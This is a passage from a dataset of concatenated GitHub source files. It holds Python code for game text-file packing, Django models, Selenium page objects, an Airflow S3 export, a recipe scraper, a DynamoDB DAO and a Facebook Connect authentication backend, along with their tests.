enumerate(fmg_entries):\n if range_start_index is None:\n range_start_index = string_index\n range_start = range_stop = string_id\n elif string_id == range_stop + 1:\n # Expand current range to include this string.\n range_stop += 1\n else:\n # Terminate last range...\n ranges.append(\n self.RANGE_STRUCT.pack(first_index=range_start_index, first_id=range_start, last_id=range_stop)\n )\n # ... then start new one at this string.\n range_start_index = string_index\n range_start = range_stop = string_id\n\n if range_start is not None:\n # Terminate last range.\n ranges.append(\n self.RANGE_STRUCT.pack(first_index=range_start_index, first_id=range_start, last_id=range_stop)\n )\n\n packed_ranges = b\"\".join(ranges)\n\n # Compute table offsets.\n ranges_offset = self.HEADER_STRUCT.size\n string_offsets_offset = ranges_offset + len(packed_ranges)\n packed_strings_offset = string_offsets_offset + self.STRING_OFFSET_STRUCT.size * len(string_offset_list)\n file_size = packed_strings_offset + len(packed_strings)\n packed_string_offsets = b\"\"\n for string_offset in string_offset_list:\n if string_offset == -1:\n packed_string_offsets += self.STRING_OFFSET_STRUCT.pack(offset=0)\n else:\n packed_string_offsets += self.STRING_OFFSET_STRUCT.pack(offset=packed_strings_offset + string_offset)\n\n packed_header = self.HEADER_STRUCT.pack(\n file_size=file_size,\n range_count=len(ranges),\n string_count=len(fmg_entries),\n string_offsets_offset=string_offsets_offset,\n )\n\n return packed_header + packed_ranges + packed_string_offsets + packed_strings\n\n def write(\n self,\n file_path=None,\n make_dirs=True,\n check_hash=False,\n remove_empty_entries=True,\n pipe_to_newline=True,\n word_wrap_limit=None,\n max_lines=None,\n ):\n \"\"\"Write binary FMG to given path. See `pack` for descriptions of the other arguments.\"\"\"\n super().write(\n file_path=file_path,\n make_dirs=make_dirs,\n check_hash=check_hash,\n remove_empty_entries=remove_empty_entries,\n pipe_to_newline=pipe_to_newline,\n word_wrap_limit=word_wrap_limit,\n max_lines=max_lines,\n )\n\n def __getitem__(self, index: int):\n return self.entries[index]\n\n def __setitem__(self, index: int, text: str):\n self.entries[index] = text\n\n def update(self, entries):\n if isinstance(entries, dict):\n return self.entries.update(entries)\n elif isinstance(entries, BaseFMG):\n return self.entries.update(entries.entries)\n raise TypeError(f\"Can only call `FMG.update()` with a dictionary or another FMG, not {type(entries)}.\")\n\n def find(self, search_string, replace_with=None):\n \"\"\"Search for the given text in this FMG.\n\n Args:\n search_string: Text to find. The text can appear anywhere inside an entry to return a result.\n replace_with: String to replace the given text with in any results. (Default: None)\n \"\"\"\n found_something = False\n for index, text in self.entries.items():\n if search_string in text:\n if not found_something:\n print(f\"\\n~~~ FMG: {str(self.path) if self.path is not None else ''}\")\n found_something = True\n print(f\"\\n [{index}]:\\n{text}\")\n if replace_with is not None:\n self.entries[index] = text.replace(search_string, replace_with)\n print(f\" -> {self.entries[index]}\")\n if not found_something:\n print(f\"Could not find any occurrences of string {repr(search_string)}.\")\n\n def __iter__(self):\n return iter(self.entries.items())\n\n def __eq__(self, other):\n if isinstance(other, dict):\n return self.entries == other\n elif isinstance(other, BaseFMG):\n return self.entries == other.entries\n raise TypeError(\"Can only test FMG equality with a dictionary or other `BaseFMG`.\")\n\n def __repr__(self):\n s = f\"FMG Path: {str(self.path) if self.path is not None else ''}\"\n for index, text in self.entries.items():\n s += f\"\\n {index}: {text}\"\n return s\n\n\nclass FMG0(BaseFMG):\n \"\"\"Used only in Demon's Souls. Big-endian.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", True),\n (\"version\", \"b\", 0),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", -1),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"string_offsets_offset\", \"i\"),\n (\"zero\", \"i\", 0),\n byte_order=\">\",\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n byte_order=\">\",\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"i\"),\n byte_order=\">\",\n )\n BIG_ENDIAN = True\n VERSION = 0\n\n MAX_LINES = None # TODO: Don't know for Demon's Souls.\n\n\nclass FMG1(BaseFMG):\n \"\"\"Used in Dark Souls (both versions) and Dark Souls 2.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", False),\n (\"version\", \"b\", 1),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", 0),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"string_offsets_offset\", \"i\"),\n (\"zero\", \"i\", 0),\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"i\"),\n )\n BIG_ENDIAN = False\n VERSION = 1\n\n MAX_LINES = 11 # TODO: Correct for DS1, not sure about DS2.\n\n\nclass FMG2(BaseFMG):\n \"\"\"Used in Bloodborne, Dark Souls 3, Sekiro, and Elden Ring.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", False),\n (\"version\", \"b\", 2),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", 0),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"unknown2\", \"i\", 255),\n (\"string_offsets_offset\", \"q\"),\n (\"zero\", \"q\", 0),\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n \"4x\",\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"q\"),\n )\n BIG_ENDIAN = False\n VERSION = 2\n\n MAX_LINES = None # TODO: Don't know for Bloodborne or DS3.\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/text/fmg.py","file_name":"fmg.py","file_ext":"py","file_size_in_byte":15361,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"19839194671","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\n\n\nclass Contact(models.Model):\n \"\"\"Portfolio model\"\"\"\n \n email = models.EmailField(help_text='Example: Alfredemmanuelinyang@gmail.com')\n subject = models.CharField(max_length=100, help_text='Subject of discussion')\n message = models.TextField(max_length=10000)\n \n def __str__(self):\n return 'Contact Me!'\n\n def create_user_profile(sender, instance, created, **kwargs):\n \"\"\"Creates a profile for each registered regular user\"\"\"\n\n if created and instance:\n Contact.objects.create(user=instance)\n\n post_save.connect(create_user_profile, sender=User)\n\n def save(self, *args, **kwargs):\n \"\"\"Save profile and resize profile image\"\"\"\n\n super(Contact, self).save(*args, **kwargs)","repo_name":"Pycomet-zz/portfolio-website","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"20304424786","text":"from selenium.webdriver.common.by import By\nfrom POM.Utilites.DriverActions import DriverAction\n\n\nclass HomePage:\n def __init__(self, driver):\n self.driver = driver\n self.da = DriverAction(driver)\n\n self.drop_down_xpath = \"//div[contains(text(),'48131421')]//following::div[1]\"\n self.option_css = \"#app > div.v-menu__content.theme--light.menuable__content__active>div>div:nth-child(2)>div>div\"\n self.blank_option_xpath = \"//div[contains(text(),'48131421')]//following::div[@class='v-list-item__content'][1]\"\n self.check_box_xpath = \"//div[contains(text(),'48131421')]//preceding::div[@class='v-input--selection-controls__ripple'][1]\"\n self.update_button_xpath = \"//span[contains(text(),'Update')]\"\n self.alert_ok_button_xpath = \"//span[contains(text(),'Ok')]\"\n self.sign_out_xpath = \"//span[contains(text(),'Sign Out')]\"\n\n def select_option_and_update(self):\n self.da.wait_for_element(self.drop_down_xpath).click()\n selectedOption = self.da.wait_for_element(self.option_css, by=By.CSS_SELECTOR)\n selectedText = selectedOption.text\n selectedOption.click()\n self.da.wait_for_element(self.check_box_xpath).click()\n self.da.wait_for_element(self.update_button_xpath).click()\n self.da.wait_for_element(self.alert_ok_button_xpath).click()\n\n self.driver.refresh()\n return selectedText\n\n def select_blank_option_and_update(self):\n self.da.wait_for_element(self.drop_down_xpath).click()\n selectedOption = self.da.wait_for_element(self.blank_option_xpath)\n selectedText = selectedOption.text\n selectedOption.click()\n self.da.wait_for_element(self.check_box_xpath).click()\n self.da.wait_for_element(self.update_button_xpath).click()\n self.da.wait_for_element(self.alert_ok_button_xpath).click()\n self.driver.refresh()\n\n return selectedText\n\n def logout(self):\n self.da.wait_for_element(self.sign_out_xpath).click()\n","repo_name":"RautelaZone/old_stuff_2021","sub_path":"Interview Projects/NMG_Technology_POM/Pages/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28920516311","text":"def run():\n\n # To use reduce\n from functools import reduce\n\n # With list comprehensions\n my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n odd = [i for i in my_list if i % 2 != 0]\n print(\"With list comprehensions = {}\".format(odd))\n\n # With filter function\n my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n odd = list(filter(lambda i: i % 2 != 0, my_list))\n print(\"With filter function = {}\".format(odd))\n\n print(\"-----------------------------------------------------------\")\n\n # With list comprehensions\n my_list = [1, 2, 3, 4, 5]\n squares = [i ** 2 for i in my_list]\n print(\"With list comprehensions = {}\".format(squares))\n\n # With map function\n my_list = [1, 2, 3, 4, 5]\n squares = list(map(lambda i: i ** 2, my_list))\n print(\"With map function = {}\".format(squares))\n\n print(\"-----------------------------------------------------------\")\n\n # With for loop\n my_list = [2, 2, 2, 2, 2]\n all_multiplied = 1\n\n for i in my_list:\n all_multiplied = all_multiplied * i\n\n print(\"With a for loop = {}\".format(all_multiplied))\n\n # With reduce function\n my_list = [2, 2, 2, 2, 2]\n all_multiplied = reduce(lambda a, b: a * b, my_list)\n print(\"With reduce function = {}\".format(all_multiplied))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"SergioO21/intermediate_python","sub_path":"high_order_functions.py","file_name":"high_order_functions.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34202699998","text":"#! /usr/bin/env python3\n\nimport argparse\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\n\n\ndef scrape(url):\n try:\n html = urlopen(url)\n except HTTPError:\n return None\n soup = BeautifulSoup(html.read())\n content = {}\n content['title'] = get_title(soup)\n content['ingredients'] = get_ingredients(soup)\n content['directions'] = get_directions(soup)\n content['servings'] = get_servings(soup)\n content['source'] = 'Bon Appetit'\n content['source_url'] = url\n content['img_url'] = get_img_url(soup)\n content['cooking_time'] = get_cooking_time(soup)\n content['total_time'] = get_total_time(soup)\n content['notes'] = get_notes(soup)\n\n return content\n\ndef get_title(soup):\n try:\n title = soup.find('h3', {'class': 'recipe-title'})\n return title.text\n except AttributeError:\n return ''\n\ndef get_img_url(soup):\n try:\n img_url = soup.find('meta', {'property': 'og:image'})\n return img_url.attrs['content']\n except AttributeError:\n return ''\n\ndef get_ingredients(soup):\n try:\n ingredients = []\n for ingredient in soup.findAll('span', {'class': 'ingredient'}):\n\n quantity = ingredient.find('span', {'class': 'quantity'}).text\n unit = ingredient.find('span', {'class': 'unit'}).text\n name = ingredient.find('span', {'class': 'name'}).text\n ingredient_str = ''\n if quantity:\n ingredient_str += quantity\n if unit:\n if quantity:\n ingredient_str += \" \"\n ingredient_str += unit\n if name:\n if quantity or unit:\n ingredient_str += \" \"\n name = name.replace('\\u2028\\t', '')\n ingredient_str += name\n ingredients.append(ingredient_str)\n return ingredients\n except AttributeError:\n return ''\n\ndef get_directions(soup):\n try:\n directions = []\n for direction in soup.findAll('div', {'itemprop': 'recipeInstructions'}):\n directions.append(direction.text)\n return directions\n except AttributeError:\n return ''\n\ndef get_servings(soup):\n try:\n servings = soup.find('span', {'class': 'total-servings'}).text\n if servings:\n return servings.split('Servings: ')[1]\n except AttributeError:\n return ''\n\ndef get_cooking_time(soup):\n try:\n cooking_time = soup.find('span', {'class': 'active-time',\n 'itemprop': ''}).text\n if cooking_time:\n return cooking_time.split('active: ')[1]\n except AttributeError:\n return ''\n\ndef get_total_time(soup):\n try:\n total_time = soup.find('span', {'class': 'active-time',\n 'itemprop': 'totalTime'}).text\n if total_time:\n return total_time.split('total: ')[1]\n except AttributeError:\n return ''\n\ndef get_notes(soup):\n try:\n notes = soup.find('div', {'class': 'content-intro'}).h2.text\n return notes\n except AttributeError:\n return ''\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Scraper for Bon Appetit website')\n parser.add_argument('url', action='store', help='url to scrape')\n return parser.parse_args()\n\n\ndef print_recipe(d):\n print(d['title'])\n print('\\n\\nIngredients:\\n')\n print('\\n'.join(d['ingredients']))\n print('\\n\\nDirections:\\n')\n print('\\n\\n'.join(d['directions']))\n if d['servings']:\n print('\\n\\nServings: ', d['servings'])\n if d['source']:\n print('\\nSource: ', d['source'])\n if d['url']:\n print('\\nSource URL: ', d['source_url'])\n if d['img_url']:\n print('\\nImage URL: ', d['img_url'])\n if d['cooking_time']:\n print('\\nCooking Time: ', d['cooking_time'])\n if d['total_time']:\n print('\\nTotal Time: ', d['total_time'])\n if d['notes']:\n print('\\nNotes:\\n')\n print(d['notes'])\n\n\nif __name__ == '__main__':\n args = parse_args()\n print_recipe(scrape(args.url))\n","repo_name":"benosment/bas","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40098811466","text":"\nimport pytest\nfrom datetime import datetime, timezone\nfrom unittest.mock import MagicMock, patch\n\nfrom model import ConnectionAction, ConnectionItem\nfrom dao import ConnectionDao, ConnectionNotFoundException\n\npath = 'dao.connection_dao'\n\n\nclass TestConnectionDao:\n\n @pytest.fixture(autouse=True)\n def datetime_mock(self):\n with patch(f'{path}.datetime') as mock:\n mock.now.return_value = datetime(2022, 1, 1, tzinfo=timezone.utc)\n yield mock\n \n @pytest.fixture\n def transaction(self):\n return MagicMock()\n\n @pytest.fixture\n def obj(self):\n dao = ConnectionDao()\n with patch.object(dao, 'client'):\n yield dao\n\n def test_init(self, obj):\n assert isinstance(obj, ConnectionDao)\n\n def test_create(self, obj):\n obj.create(ConnectionItem(id='test', modified_action=ConnectionAction.CREATE_CONNECTION))\n obj.client.put_item.assert_called_once_with(**{\n 'TableName': 'DeathDiceStage',\n 'Item': {\n 'id': {'S': 'test'},\n 'nickname': {'NULL': True},\n 'account_id': {'NULL': True},\n 'game_id': {'NULL': True},\n 'modified_action': {'S': 'CREATE_CONNECTION'},\n 'version': {'N': '0'},\n 'modified_at': {'S': '2022-01-01 00:00:00.000000'},\n 'table': {'S': 'Connection'},\n },\n 'ConditionExpression': 'attribute_not_exists(id)',\n })\n \n def test_get(self, obj, datetime_mock):\n obj.client.get_item.return_value = {\n 'Item': ConnectionItem.serialise(\n ConnectionItem(\n id='test',\n modified_at=datetime_mock.now(),\n modified_action=ConnectionAction.SET_NICKNAME,\n )\n )\n }\n item = obj.get('test')\n assert isinstance(item, ConnectionItem)\n assert item.id == 'test'\n obj.client.get_item.assert_called_once_with(**{\n 'TableName': 'DeathDiceStage',\n 'Key': {'id': {'S': 'test'}},\n })\n \n def test_get_not_found(self, obj, datetime_mock):\n obj.client.get_item.return_value = {}\n with pytest.raises(ConnectionNotFoundException):\n obj.get('id')\n\n def test_set(self, obj, transaction, datetime_mock):\n obj.set(\n ConnectionItem(\n id='id',\n modified_action=ConnectionAction.SET_NICKNAME,\n account_id='account_id',\n game_id='game_id',\n version=2,\n modified_at=datetime_mock.now()\n ),\n transaction,\n )\n\n transaction.write.assert_called_once_with({\n 'Put': {\n 'TableName': 'DeathDiceStage',\n 'Item': {\n 'id': {'S': 'id'},\n 'nickname': {'NULL': True},\n 'account_id': {'S': 'account_id'},\n 'game_id': {'S': 'game_id'},\n 'modified_action': {'S': 'SET_NICKNAME'},\n 'version': {'N': '3'},\n 'modified_at': {'S': '2022-01-01 00:00:00.000000'},\n 'table': {'S': 'Connection'},\n },\n 'ConditionExpression': 'attribute_exists(id) AND version = :v',\n 'ExpressionAttributeValues': {':v': {'N': '2'}},\n }\n })\n\n def test_delete(self, obj, transaction):\n obj.delete(ConnectionItem(id=\"id\", game_id=\"game_id\", version=2, modified_action=ConnectionAction.SET_NICKNAME), transaction)\n transaction.write.assert_called_once_with({\n 'Delete': {\n 'TableName': 'DeathDiceStage',\n 'Key': {'id': {'S': 'id'}},\n 'ConditionExpression': 'attribute_exists(id) AND version = :v',\n 'ExpressionAttributeValues': {\n ':v': {'N': '2'}\n }\n }\n })\n\n @pytest.mark.parametrize('name, expected', [\n pytest.param('Roib', True, id='normal'),\n pytest.param('', False, id='too short'),\n pytest.param('1234567891011121314151617', False, id='too long'),\n pytest.param('Mr Eleven', False, id='protected word'),\n pytest.param('Mr Eleven ', False, id='protected word with space'),\n ])\n def test_is_valid_nickname(self, obj, name, expected):\n assert obj.is_valid_nickname(name) == expected\n","repo_name":"Nick-Sullivan/death-dice","sub_path":"lambda/game/test/layer/dao/test_connection_dao.py","file_name":"test_connection_dao.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12186144827","text":"\"\"\"\n 1、二叉树专题:在每个树行中找出最大值\n 2、二叉树层序遍历的变形\n\"\"\"\n# 2022/7/20 author:WH\nclass Solution:\n def largestValues(self, root):\n if not root: return []\n ans = []\n que = deque([root])\n while que:\n result = []\n for _ in range(len(que)):\n cur = que.popleft()\n result.append(cur.val)\n if cur.left:\n que.append(cur.left)\n if cur.right:\n que.append(cur.right)\n ans.append(max(result))\n return ans","repo_name":"Sirwenhao/Leetcode_solution","sub_path":"Python_Solution/middle/leetcode_0515.py","file_name":"leetcode_0515.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32771490880","text":"from db import model\n\n\n# 健壮性/鲁棒性/robust\ndef register_interface(username, pwd):\n obj = model.Admin.read(username)\n if obj:\n return '用户名已被使用'\n\n model.Admin(username, pwd)\n\n return '注册成功'\n\ndef create_school_interface(username,school_name,school_addr):\n admin_obj = model.Admin.read(username)\n school_obj = model.School.read(school_name)\n\n if school_obj:\n return f'{school_name}学校已经存在'\n\n admin_obj.create_school(school_name,school_addr)\n\n return f'{school_name}创建���功'\n\n\ndef create_teacher_interface(username,teacher_username,teacher_pwd):\n admin_obj = model.Admin.read(username)\n teacher_obj = model.Teacher.read(teacher_username)\n\n if teacher_obj:\n return f'{teacher_username}老师已经存在'\n\n admin_obj.create_teacher(teacher_username,teacher_pwd)\n\n return f'{teacher_username}创建成功'\n\n\ndef create_course_interface(username,course_name,school_name):\n admin_obj = model.Admin.read(username)\n school_obj = model.School.read(school_name)\n course_obj = model.Course.read(course_name) # None\n\n # 课程在学校里,None, [] --> [None]\n if course_obj in school_obj.course_list:\n return f'{course_name}课程已经存在'\n\n admin_obj.create_course(course_name)\n course_obj = model.Course.read(course_name)\n school_obj.add_course(course_obj) # python对象\n\n\n return f'{course_name}创建成功'","repo_name":"nickchen121/course_selected","sub_path":"interface/admin_interface.py","file_name":"admin_interface.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38616720909","text":"from airflow.providers.postgres.hooks.postgres import PostgresHook\nfrom tempfile import NamedTemporaryFile\nimport csv\nfrom airflow.utils.db import provide_session\nfrom airflow.providers.amazon.aws.hooks.s3 import S3Hook\nfrom tempfile import NamedTemporaryFile\nimport logging\n\ndef _postgres_to_s3(ds):\n '''\n Send data from Postgres to S3 bucket.\n '''\n #https://www.youtube.com/watch?v=rcG4WNwi900\n #first query data from psql and save in text file\n hook = PostgresHook(postgres_conn_id=\"postgres_localhost\")\n conn = hook.get_conn()\n cursor = conn.cursor()\n cursor.execute('select * from games;')\n with NamedTemporaryFile(mode='w') as f: #puts file in temp folder\n csv_writer = csv.writer(f)\n csv_writer.writerow([i[0] for i in cursor.description])\n csv_writer.writerows(cursor)\n f.flush()\n cursor.close()\n conn.close()\n logging.info(f'Saved postgres data in text file: games.txt')\n #step 2: upload text file into s3\n s3_hook = S3Hook(aws_conn_id='aws_hook')\n s3_hook.load_file(\n filename=f.name,\n key=f'games/games_{ds}.csv',\n bucket_name='mlb-project',\n replace=True\n )\n logging.info(f' {f.name} has been pushed to S3')","repo_name":"DElwellGitHub/baseball-project","sub_path":"dags/functions/postgres_to_s3.py","file_name":"postgres_to_s3.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24785709401","text":"from django.conf import settings\nfrom django.contrib.auth.models import User, UserManager\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom d51.django.auth.facebook.backends import FacebookConnectBackend, FACEBOOK_CONNECT_BACKEND_STRING\nfrom d51.django.auth.facebook.managers import FacebookIDManager\nfrom d51.django.auth.facebook.models import FacebookID\nfrom facebook import Facebook\nimport mox\nfrom random import randint as random\n\n# Required to mock this out since its generated dynamically and Mox\n# can't/won't create stuff just for the hell of it.\nclass StubUserProxy(object):\n def getInfo(self, list):\n pass\n\ndef replay_all(*args):\n [mox.Replay(obj) for obj in args]\n\ndef verify_all(*args):\n [mox.Verify(obj) for obj in args]\n\nclass TestOfFacebookID(TestCase):\n def test_has_custom_manager(self):\n self.assert_(isinstance(FacebookID.objects, FacebookIDManager))\n\n def test_has_get_uid_method(self):\n random_id = str(random(10, 1000))\n user = User.objects.create(username=\"foobar\")\n obj = FacebookID.objects.create(pk=random_id, user=user)\n\n self.assertEqual(obj, FacebookID.objects.get_uid(random_id))\n\n obj.delete()\n user.delete()\n\n\nclass TestOfFacebookConnectBackend(TestCase):\n def test_returns_none_if_request_not_passed_in(self):\n auth = FacebookConnectBackend()\n self.assertEqual(None, auth.authenticate())\n\n def test_returns_none_if_check_session_fails(self):\n req = mox.MockObject(HttpRequest)\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(False)\n req.facebook = facebook\n\n replay_all(facebook, req)\n\n auth = FacebookConnectBackend()\n self.assertEqual(None, auth.authenticate(request = req))\n\n verify_all(facebook, req)\n\n def test_manager_defaults_to_main_FacebookIDManager_if_not_specified(self):\n auth = FacebookConnectBackend()\n self.assertTrue(isinstance(auth.manager, FacebookIDManager))\n\n def test_uses_custom_manager_if_provided(self):\n obj = object()\n auth = FacebookConnectBackend(manager = obj)\n self.assertEquals(obj, auth.manager)\n\n def test_user_manager_defaults_to_main_UserManager_if_not_specified(self):\n auth = FacebookConnectBackend()\n self.assertTrue(isinstance(auth.user_manager, UserManager))\n\n def test_uses_custom_user_manager_if_provided(self):\n obj = object()\n auth = FacebookConnectBackend(user_manager = obj)\n self.assertEquals(obj, auth.user_manager)\n\n def test_returns_user_if_found(self):\n random_id = random(10, 100)\n\n user = mox.MockObject(User)\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n replay_all(req, facebook, user, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n self.assertEqual(user, auth.authenticate(request=req))\n\n verify_all(req, facebook, user, fb_id, fb_manager)\n\n def test_returned_user_has_backend_set_to_facebook_backend(self):\n random_id = random(10, 100)\n\n user = mox.MockObject(User)\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n replay_all(req, facebook, user, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n auth.authenticate(request=req)\n self.assertEqual(FACEBOOK_CONNECT_BACKEND_STRING, req.user.backend)\n\n verify_all(req, facebook, user, fb_id, fb_manager)\n\n\n\n def test_returns_newly_created_user_if_not_found(self):\n random_id = random(10, 100)\n username = 'fb$%d' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(False)\n user.username = username\n user.set_unusable_password()\n user.save()\n\n user_manager = mox.MockObject(UserManager)\n user_manager.create(\n username=username,\n first_name='Bob',\n last_name='Example'\n ).AndReturn(user)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.model = FacebookID\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.create(pk = random_id, user = user).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n facebook.users = mox.MockObject(StubUserProxy)\n facebook.users.getInfo([random_id], ['name']).AndReturn([{\"name\": \"Bob Example\"}])\n req.facebook = facebook\n\n replay_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager, user_manager=user_manager)\n new_user = auth.authenticate(request = req)\n self.assertTrue(isinstance(new_user, User))\n\n verify_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n def test_creates_new_fb_id_for_existing_user(self):\n random_id = random(10, 100)\n username = 'fb$%d' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(True)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n req.facebook = facebook\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.model = FacebookID\n fb_manager.create(pk=random_id, user=user).AndReturn(fb_id)\n\n replay_all(user, req, facebook, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager)\n new_user = auth.authenticate(request=req)\n self.assertEqual(new_user, user)\n\n verify_all(user, req, facebook, fb_manager)\n\n def test_provides_expected_get_user_functionality(self):\n user_id = random(10, 100)\n user = mox.MockObject(User)\n user_manager = mox.MockObject(UserManager)\n user_manager.get(pk = user_id).AndReturn(user)\n replay_all(user, user_manager)\n\n auth = FacebookConnectBackend(user_manager=user_manager)\n self.assertEqual(user, auth.get_user(user_id))\n verify_all(user, user_manager)\n\n def test_returns_none_if_no_user_is_found(self):\n user_id = random(10, 100)\n user_manager = mox.MockObject(UserManager)\n user_manager.model = User\n user_manager.get(pk=user_id).AndRaise(User.DoesNotExist)\n replay_all(user_manager)\n\n auth = FacebookConnectBackend(user_manager=user_manager)\n self.assertEqual(None, auth.get_user(user_id))\n verify_all(user_manager)\n\n def test_handles_string_for_facebook_uid_for_creation(self):\n random_id = str(random(10, 100))\n username = 'fb$%s' % random_id\n\n user = mox.MockObject(User)\n user.is_authenticated().AndReturn(False)\n user.username = username\n user.set_unusable_password()\n user.save()\n\n user_manager = mox.MockObject(UserManager)\n user_manager.create(\n username=username,\n first_name='Bob',\n last_name='Example'\n ).AndReturn(user)\n\n fb_id = mox.MockObject(FacebookID)\n fb_id.user = user\n\n fb_manager = mox.MockObject(FacebookIDManager)\n fb_manager.model = FacebookID\n fb_manager.get_uid(random_id).AndRaise(FacebookID.DoesNotExist())\n fb_manager.create(pk = random_id, user = user).AndReturn(fb_id)\n\n req = mox.MockObject(HttpRequest)\n req.user = user\n facebook = mox.MockObject(Facebook)\n facebook.check_session(req).AndReturn(True)\n facebook.uid = random_id\n facebook.users = mox.MockObject(StubUserProxy)\n facebook.users.getInfo([random_id], ['name']).AndReturn([{\"name\": \"Bob Example\"}])\n req.facebook = facebook\n\n replay_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\n auth = FacebookConnectBackend(manager=fb_manager, user_manager=user_manager)\n new_user = auth.authenticate(request = req)\n self.assertTrue(isinstance(new_user, User))\n\n verify_all(user, user_manager, req, facebook, facebook.users, fb_id, fb_manager)\n\nclass TestOfPyFacebook(TestCase):\n def validate_signature_return(self):\n return {\n \"in_canvas\": \"0\",\n \"in_iframe\": \"0\",\n \"in_profile_tab\": \"0\",\n \"added\": \"0\",\n \"expires\": \"123\",\n }\n\n def test_can_handle_pyfacebook_error_on_none_expires(self):\n # setup partial mock on check_session()\n request = mox.MockObject(HttpRequest)\n request.method = \"GET\"\n request.GET = {}\n request.POST = {}\n facebook = Facebook('foo', 'bar', 'baz')\n request.facebook = facebook\n\n def mock_validate_signature(*args, **kwargs):\n ret = self.validate_signature_return()\n ret['expires'] = 'None'\n return ret\n facebook.validate_signature = mock_validate_signature\n\n replay_all(request)\n\n auth = FacebookConnectBackend()\n self.assertEqual(None, auth.authenticate(request=request))\n\n def 